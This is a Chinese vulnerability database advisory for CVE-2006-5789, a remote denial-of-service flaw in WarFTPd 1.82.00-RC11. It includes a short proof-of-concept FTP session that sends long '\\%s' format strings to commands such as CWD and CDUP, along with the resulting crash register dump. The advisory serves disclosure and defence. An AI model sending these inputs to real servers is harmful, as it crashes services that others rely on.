漏洞信息详情
WarFTPd多个命令处理远程拒绝服务漏洞
- CNNVD编号:CNNVD-200611-119
- 危害等级: 中危
- CVE编号: CVE-2006-5789
- 漏洞类型: 资源管理错误
- 发布时间: 2006-11-07
- 威胁类型: 远程
- 更新时间: 2006-11-16
- 厂 商: jgaa
- 漏洞来源: Joxean Koret joxea...
漏洞简介
War FTP Daemon(warftpd)是一款用于Windows平台中的免费FTP服务器,它支持多重连接、用户权限设置和磁盘配额限制等。
WarFTPd在处理多个命令的畸形参数时存在漏洞,远程攻击者可能利用此漏洞对服务器造成拒绝服务。
如果向各种命令发送了包含有两次\"\\%s\"字符的超长字符串的话,就会导致WarFTPd拒绝服务。例如,发送以下命令:
$ ftp target
(Banner)
ftp> quote user anonymous
ftp> quote pass bla
ftp> cwd \\%s*256
或者:
ftp> cdup \\%s*256
就会导致服务器崩溃:
EAX 00000001
ECX 00000073
EDX 00000002
EBX 0079E890
ESP 0079E7A0
EBP 00A55A8A ASCII
\"s\\%s\\%s\\%s\\%s\\%s\\%s\\%s\\%s\\%s\\%s\\%s\\%s\\%s\\%s\\%s(...more \\%s
characters)\"
ESI 0079E7DE
EDI 0000000A
EIP 00431540 war-ftpd.00431540
00431540 8A08 MOV CL,BYTE PTR DS:[EAX]
目前已知至少以下命令受这个漏洞影响:
CWD
CDUP
DELE
NLST
LIST
SIZE
漏洞公告
目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://support.jgaa.com/index.php?MenuPage=frontpage
参考网址
来源: BID
名称: 20944
链接:http://www.securityfocus.com/bid/20944
来源: BUGTRAQ
名称: 20061107 WarFTPd 1.82.00-RC11 Remote Denial Of Service
链接:http://www.securityfocus.com/archive/1/archive/1/450804/100/0/threaded
来源: VUPEN
名称: ADV-2006-4398
链接:http://www.frsirt.com/english/advisories/2006/4398
来源: SECTRACK
名称: 1017174
链接:http://securitytracker.com/id?1017174
来源: SECUNIA
名称: 22755
链接:http://secunia.com/advisories/22755
来源: XF
名称: warftpd-string-dos(30077)
链接:http://xforce.iss.net/xforce/xfdb/30077
来源: SREASON
名称: 1832
链接:http://securityreason.com/securityalert/1832
受影响实体
- Jgaa Warftpd:1.82.00_rc11
补丁
暂无
![weinxin](http://zone.ci/zone_ci_images/zone.ci.png)
评论